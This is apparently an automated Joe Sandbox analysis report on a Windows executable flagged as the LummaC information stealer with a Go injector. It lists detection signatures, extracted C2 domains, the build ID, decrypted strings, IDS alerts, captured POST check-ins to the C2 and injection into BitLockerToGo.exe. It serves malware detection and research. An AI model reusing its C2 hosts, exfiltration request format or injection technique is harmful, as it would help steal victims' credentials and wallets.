Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
iq2HxA0SLw.exe

Overview

General Information

Sample name:iq2HxA0SLw.exe
renamed because original name is a hash value
Original sample name:da6f9e46eacbde011e7d9a6e742d05c9.exe
Analysis ID:1519274
MD5:da6f9e46eacbde011e7d9a6e742d05c9
SHA1:a022be00f60db2721120fbbf2acdd4435e86706a
SHA256:ac4b0d4dbdb661c626eef6c128ab65bbf2de3112dde7ef4d526520d1bae9d29f
Tags:exeuser-abuse_ch
Infos:

Detection

LummaC, Go Injector, LummaC Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Go Injector
Yara detected LummaC Stealer
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Injects a PE file into a foreign processes
LummaC encrypted strings found
Sample uses string decryption to hide its real strings
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses a known web browser user agent for HTTP communication
Yara signature match

Classification

  • System is w10x64
  • iq2HxA0SLw.exe (PID: 2992 cmdline: "C:\Users\user\Desktop\iq2HxA0SLw.exe" MD5: DA6F9E46EACBDE011E7D9A6E742D05C9)
    • BitLockerToGo.exe (PID: 2600 cmdline: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe MD5: A64BEAB5D4516BECA4C40B25DC0C1CD8)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["racedsuitreow.shop", "priooozekw.shop", "defenddsouneuw.shop", "pianoswimen.shop", "surroundeocw.shop", "abortinoiwiam.shop", "pumpkinkwquo.shop", "covvercilverow.shop", "deallyharvenw.shop"], "Build id": "tLYMe5--rui333"}
SourceRuleDescriptionAuthorStrings
iq2HxA0SLw.exeJoeSecurity_GoInjector_2Yara detected Go InjectorJoe Security
    SourceRuleDescriptionAuthorStrings
    00000000.00000002.1859291305.000000C000716000.00000004.00001000.00020000.00000000.sdmpMsfpayloads_msf_9Metasploit Payloads - file msf.war - contentsFlorian Roth
    • 0x0:$x1: 4d5a9000030000000
    00000000.00000000.1418035635.00007FF6A99C7000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_GoInjector_2Yara detected Go InjectorJoe Security
      00000000.00000002.1863283759.00007FF6A99C7000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_GoInjector_2Yara detected Go InjectorJoe Security
        Process Memory Space: iq2HxA0SLw.exe PID: 2992JoeSecurity_GoInjector_2Yara detected Go InjectorJoe Security
          decrypted.memstrJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
            No Sigma rule has matched
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-09-26T09:47:01.378739+020020546531A Network Trojan was detected192.168.2.949708104.21.37.97443TCP
            2024-09-26T09:47:02.487821+020020546531A Network Trojan was detected192.168.2.949709104.21.37.97443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-09-26T09:47:01.378739+020020498361A Network Trojan was detected192.168.2.949708104.21.37.97443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-09-26T09:47:02.487821+020020498121A Network Trojan was detected192.168.2.949709104.21.37.97443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-09-26T09:47:01.202824+020020560791Domain Observed Used for C2 Detected192.168.2.949708104.21.37.97443TCP
            2024-09-26T09:47:01.975769+020020560791Domain Observed Used for C2 Detected192.168.2.949709104.21.37.97443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-09-26T09:47:00.715068+020020560781Domain Observed Used for C2 Detected192.168.2.9540441.1.1.153UDP

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: priooozekw.shopAvira URL Cloud: Label: malware
            Source: surroundeocw.shopAvira URL Cloud: Label: malware
            Source: https://racedsuitreow.shop/apiAvira URL Cloud: Label: malware
            Source: https://racedsuitreow.shop/api$&Avira URL Cloud: Label: malware
            Source: racedsuitreow.shopAvira URL Cloud: Label: malware
            Source: https://racedsuitreow.shop/xyAvira URL Cloud: Label: malware
            Source: covvercilverow.shopAvira URL Cloud: Label: malware
            Source: pianoswimen.shopAvira URL Cloud: Label: malware
            Source: https://racedsuitreow.shop/api=Avira URL Cloud: Label: malware
            Source: abortinoiwiam.shopAvira URL Cloud: Label: malware
            Source: pumpkinkwquo.shopAvira URL Cloud: Label: malware
            Source: defenddsouneuw.shopAvira URL Cloud: Label: malware
            Source: deallyharvenw.shopAvira URL Cloud: Label: malware
            Source: 0.2.iq2HxA0SLw.exe.c0009c2000.6.unpackMalware Configuration Extractor: LummaC {"C2 url": ["racedsuitreow.shop", "priooozekw.shop", "defenddsouneuw.shop", "pianoswimen.shop", "surroundeocw.shop", "abortinoiwiam.shop", "pumpkinkwquo.shop", "covvercilverow.shop", "deallyharvenw.shop"], "Build id": "tLYMe5--rui333"}
            Source: iq2HxA0SLw.exeReversingLabs: Detection: 58%
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 96.5% probability
            Source: 00000000.00000002.1860600994.000000C000800000.00000004.00001000.00020000.00000000.sdmpString decryptor: covvercilverow.shop
            Source: 00000000.00000002.1860600994.000000C000800000.00000004.00001000.00020000.00000000.sdmpString decryptor: surroundeocw.shop
            Source: 00000000.00000002.1860600994.000000C000800000.00000004.00001000.00020000.00000000.sdmpString decryptor: abortinoiwiam.shop
            Source: 00000000.00000002.1860600994.000000C000800000.00000004.00001000.00020000.00000000.sdmpString decryptor: pumpkinkwquo.shop
            Source: 00000000.00000002.1860600994.000000C000800000.00000004.00001000.00020000.00000000.sdmpString decryptor: priooozekw.shop
            Source: 00000000.00000002.1860600994.000000C000800000.00000004.00001000.00020000.00000000.sdmpString decryptor: deallyharvenw.shop
            Source: 00000000.00000002.1860600994.000000C000800000.00000004.00001000.00020000.00000000.sdmpString decryptor: defenddsouneuw.shop
            Source: 00000000.00000002.1860600994.000000C000800000.00000004.00001000.00020000.00000000.sdmpString decryptor: racedsuitreow.shop
            Source: 00000000.00000002.1860600994.000000C000800000.00000004.00001000.00020000.00000000.sdmpString decryptor: pianoswimen.shop
            Source: 00000000.00000002.1860600994.000000C000800000.00000004.00001000.00020000.00000000.sdmpString decryptor: lid=%s&j=%s&ver=4.0
            Source: 00000000.00000002.1860600994.000000C000800000.00000004.00001000.00020000.00000000.sdmpString decryptor: TeslaBrowser/5.5
            Source: 00000000.00000002.1860600994.000000C000800000.00000004.00001000.00020000.00000000.sdmpString decryptor: - Screen Resoluton:
            Source: 00000000.00000002.1860600994.000000C000800000.00000004.00001000.00020000.00000000.sdmpString decryptor: - Physical Installed Memory:
            Source: 00000000.00000002.1860600994.000000C000800000.00000004.00001000.00020000.00000000.sdmpString decryptor: Workgroup: -
            Source: 00000000.00000002.1860600994.000000C000800000.00000004.00001000.00020000.00000000.sdmpString decryptor: tLYMe5--rui333
            Source: unknownHTTPS traffic detected: 104.21.37.97:443 -> 192.168.2.9:49708 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.37.97:443 -> 192.168.2.9:49709 version: TLS 1.2
            Source: iq2HxA0SLw.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
            Source: Binary string: BitLockerToGo.pdb source: iq2HxA0SLw.exe, 00000000.00000002.1860600994.000000C000A56000.00000004.00001000.00020000.00000000.sdmp, iq2HxA0SLw.exe, 00000000.00000003.1840383482.000002457F310000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: BitLockerToGo.pdbGCTL source: iq2HxA0SLw.exe, 00000000.00000002.1860600994.000000C000A56000.00000004.00001000.00020000.00000000.sdmp, iq2HxA0SLw.exe, 00000000.00000003.1840383482.000002457F310000.00000004.00001000.00020000.00000000.sdmp
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [esp]5_2_0296D1A0
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [esp]5_2_0296D1A0
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx edx, byte ptr [ecx+eax]5_2_0296F860
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [esp+04h]5_2_0299FCBC
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [esp]5_2_029AA2AE
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx ebx, byte ptr [edx]5_2_0299B3F0
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [esp]5_2_029AA310
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [ebp-14h]5_2_0298A324
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [esp]5_2_029880AF
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], 0633C81Dh5_2_029A90F0
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [esp]5_2_029A90F0
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [esi+60h]5_2_02993024
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov byte ptr [ecx], al5_2_02993024
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp byte ptr [esi+ebx], 00000000h5_2_0298E19C
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp word ptr [ebp+edi+02h], 0000h5_2_029871F0
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov dword ptr [esp], 00000000h5_2_0297B130
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov ebx, ecx5_2_02974166
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp byte ptr [edi+029B6029h], 00000000h5_2_029736C9
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [esp+04h]5_2_029736C9
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], 54CA534Eh5_2_029A8650
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, ecx5_2_0297E669
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], CECD21FDh5_2_0298C720
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], CECD21FDh5_2_0298C720
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [esp+04h]5_2_02973756
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp word ptr [eax+esi+02h], 0000h5_2_0298E740
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then jmp dword ptr [029B33A4h]5_2_0298E740
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]5_2_029904D0
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov byte ptr [edi], al5_2_0298E419
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov word ptr [eax], cx5_2_02987450
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then jmp edx5_2_02988446
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [esp+18h]5_2_0297F467
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp dword ptr [ebx+edx*8], 1B788DCFh5_2_029A4590
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [esp]5_2_029A7BB0
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx edx, byte ptr [esi+ebx]5_2_02965BC0
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [esp+08h]5_2_029A5B00
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx edx, byte ptr [esi+edi]5_2_02964B70
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp dword ptr [ebx+edx*8], 7E28BDA7h5_2_029AAB60
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], 0633C81Dh5_2_029A5850
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [esp+58h]5_2_0297590B
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp word ptr [eax+esi+02h], 0000h5_2_0298EE86
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp word ptr [ecx+edx+02h], 0000h5_2_029AAE70
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp dword ptr [ebp+edx*8+00h], 81105F7Ah5_2_029AAE70
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp byte ptr [esi], 00000000h5_2_02973F86
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov word ptr [eax], cx5_2_02984FD0
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov byte ptr [edi], al5_2_02991FE0
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [esp]5_2_0298BF1C
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov word ptr [eax], dx5_2_02980F10
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [esp+000004B0h]5_2_0297DCD0
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp dword ptr [ebx+edx*8], 7E28BDA7h5_2_029AACF0
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp word ptr [eax+esi+02h], 0000h5_2_0298ECF4
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then inc edi5_2_02973C2A
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx ecx, word ptr [esi+eax]5_2_029A1DF0
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [esp+04h]5_2_02988D10
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov word ptr [eax], cx5_2_02988D10
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [esi]5_2_0298CD0C
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 0633C81Dh5_2_029A4D00

            Networking

            barindex
            Source: Network trafficSuricata IDS: 2056079 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (racedsuitreow .shop in TLS SNI) : 192.168.2.9:49709 -> 104.21.37.97:443
            Source: Network trafficSuricata IDS: 2056079 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (racedsuitreow .shop in TLS SNI) : 192.168.2.9:49708 -> 104.21.37.97:443
            Source: Network trafficSuricata IDS: 2056078 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (racedsuitreow .shop) : 192.168.2.9:54044 -> 1.1.1.1:53
            Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.9:49709 -> 104.21.37.97:443
            Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.9:49709 -> 104.21.37.97:443
            Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.9:49708 -> 104.21.37.97:443
            Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.9:49708 -> 104.21.37.97:443
            Source: Malware configuration extractorURLs: racedsuitreow.shop
            Source: Malware configuration extractorURLs: priooozekw.shop
            Source: Malware configuration extractorURLs: defenddsouneuw.shop
            Source: Malware configuration extractorURLs: pianoswimen.shop
            Source: Malware configuration extractorURLs: surroundeocw.shop
            Source: Malware configuration extractorURLs: abortinoiwiam.shop
            Source: Malware configuration extractorURLs: pumpkinkwquo.shop
            Source: Malware configuration extractorURLs: covvercilverow.shop
            Source: Malware configuration extractorURLs: deallyharvenw.shop
            Source: Joe Sandbox ViewIP Address: 104.21.37.97 104.21.37.97
            Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
            Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: racedsuitreow.shop
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedCookie: __cf_mw_byp=0umRl5oIKMzHffGYQzHVGWScuWA_ow6b6hNt1JaFJOc-1727336821-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 80Host: racedsuitreow.shop
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficDNS traffic detected: DNS query: pianoswimen.shop
            Source: global trafficDNS traffic detected: DNS query: racedsuitreow.shop
            Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: racedsuitreow.shop
            Source: BitLockerToGo.exe, 00000005.00000003.1862939480.0000000002F4C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.m
            Source: BitLockerToGo.exe, 00000005.00000003.1862939480.0000000002F4C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.co
            Source: iq2HxA0SLw.exeString found in binary or memory: https://github.com/golang/protobuf/issues/1609):
            Source: BitLockerToGo.exe, 00000005.00000002.1874166391.0000000002F09000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000005.00000003.1862501942.0000000002F0A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000005.00000003.1862501942.0000000002F0F000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000005.00000002.1874166391.0000000002F36000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://racedsuitreow.shop/api
            Source: BitLockerToGo.exe, 00000005.00000003.1862501942.0000000002F0F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://racedsuitreow.shop/api$&
            Source: BitLockerToGo.exe, 00000005.00000002.1874166391.0000000002F36000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://racedsuitreow.shop/api=
            Source: BitLockerToGo.exe, 00000005.00000002.1874166391.0000000002EFB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://racedsuitreow.shop/xy
            Source: BitLockerToGo.exe, 00000005.00000003.1862795729.0000000002F36000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000005.00000003.1862478504.0000000002F81000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000005.00000002.1874166391.0000000002EFB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/5xx-error-landing
            Source: BitLockerToGo.exe, 00000005.00000003.1862939480.0000000002F4C000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000005.00000003.1862795729.0000000002F36000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/learning/access-management/phishing-attack/
            Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
            Source: unknownHTTPS traffic detected: 104.21.37.97:443 -> 192.168.2.9:49708 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.37.97:443 -> 192.168.2.9:49709 version: TLS 1.2
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 5_2_02998800 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,5_2_02998800
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 5_2_02998800 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,5_2_02998800
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 5_2_02999341 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,5_2_02999341
            Source: iq2HxA0SLw.exe, 00000000.00000000.1418035635.00007FF6A92C2000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: morebuf={pc:: no frame (sp=runtime: frame runtimer: bad ptraceback stuckRegCreateKeyExWRegDeleteValueWmissing address/etc/mdns.allowunknown network is unavailableHanifi_RohingyaPsalter_Pahlavix509usepoliciesinvalid boolean0601021504Z0700non-minimal tagunknown Go typeinvalid padding (no semicolon)alsologtostderrstderrthresholdaccept-encodingaccept-languageAccept-EncodingPartial ContentRequest TimeoutLength RequiredNot ImplementedGateway Timeoutunexpected typebad trailer keyheap_idle_bytesstack_sys_bytesmspan_sys_bytesother_sys_bytesprocess_max_fdsduplicated name"UNIMPLEMENTED"InvalidArgumentUnauthenticatedUNAUTHENTICATEDinvalid kind %vCardinality(%d)weak_dependencyextension_rangeproto3_optionalunverified_lazyfeature_supportutf8_validationaggregate_valueedition_removedExcludeClipRectGetEnhMetaFileWGetTextMetricsWPlayEnhMetaFileGdiplusShutdownGetThreadLocaleOleUninitializewglGetCurrentDCDragAcceptFilesCallWindowProcWCreatePopupMenuCreateWindowExWDialogBoxParamWGetActiveWindowGetDpiForWindowGetRawInputDataInsertMenuItemWIsWindowEnabledPostQuitMessageSetActiveWindowSetWinEventHookTrackMouseEventWindowFromPointDrawThemeTextExmodulus by zerogetMillisecondsGroup: bad kindempty signature not a functionreflectlite.Setjstmpllitinterptarinsecurepathzipinsecurepathinvalid pointerBelowExactAboveResponseTimeoutMissingEndpoint#multipartfilesAccept-LanguageX-Forwarded-For()<>@,;:\"/[]?=GAUGE_HISTOGRAMAuthInfo is nilAuthInfo: <nil>15:04:05.000000/debug/requestsCLSIDFromProgIDStringFromCLSIDTLS_VERSION_1_0TLS_VERSION_1_1TLS_VERSION_1_2TLS_VERSION_1_3unclosed actionno dot in fieldtemplate clauseEurope (Zurich)Europe (London)access-analyzerapi.iotwirelessapi.mediatailorarc-zonal-shiftcloudcontrolapicloudtrail-datadata.mediastorefips-af-south-1fips-ap-south-1fips-ap-south-2fips-eu-north-1fips-eu-south-1fips-eu-south-2fips-me-south-1aws-marketplaceaws-global-fipsinternetmonitordata-ap-south-1af-south-1-fipsap-south-1-fipsap-south-2-fipseu-north-1-fipseu-south-1-fipseu-south-2-fipsme-south-1-fipslicense-managermachinelearningmessaging-chimemobileanalyticsmturk-requesterfips-aws-globalmobiletargetingresource-groupsroute53resolverwellarchitectedui-ca-central-1ui-eu-central-1China (Beijing)China (Ningxia)fips-cn-north-1data-cn-north-1avx512vpopcntdqcontenteditablehtml/template: NO_SIDE_EFFECTSLEGACY_REQUIREDLENGTH_PREFIXEDDiacriticalDot;DoubleRightTee;DownLeftVector;GreaterGreater;HorizontalLine;InvisibleComma;InvisibleTimes;LeftDownVector;LeftRightArrow;Leftrightarrow;LessSlantEqual;LongRightArrow;Longrightarrow;LowerLeftArrow;NestedLessLess;NotGreaterLess;NotLessGreater;NotSubsetEqual;NotVerticalBar;OpenCurlyQuote;ReverseElement;RightTeeVector;RightVectorBar;ShortDownArrow;ShortLeftArrow;SquareSuperset;TildeFullEqual;UpperLeftArrow;ZeroWidthSpace;curvearrowleft;doublebarwedge;downdownarrows;hookrightarrow;leftleftarrows;leftrightarrow;leftthreetimes;longrightarrow;looparrowright;nshortparallel;ntriangleright;rightarrowtail;rightharpoonup;trianglelefteq;upharpoonright;Comemstr_477571fa-d

            System Summary

            barindex
            Source: 00000000.00000002.1859291305.000000C000716000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Metasploit Payloads - file msf.war - contents Author: Florian Roth
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 5_2_029A01615_2_029A0161
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 5_2_029707705_2_02970770
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 5_2_029AB2805_2_029AB280
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 5_2_029AA2AE5_2_029AA2AE
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 5_2_029692305_2_02969230
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 5_2_0296139D5_2_0296139D
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 5_2_029673F05_2_029673F0
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 5_2_0298A3245_2_0298A324
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 5_2_0296135B5_2_0296135B
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 5_2_0297037F5_2_0297037F
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 5_2_029653605_2_02965360
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 5_2_029880AF5_2_029880AF
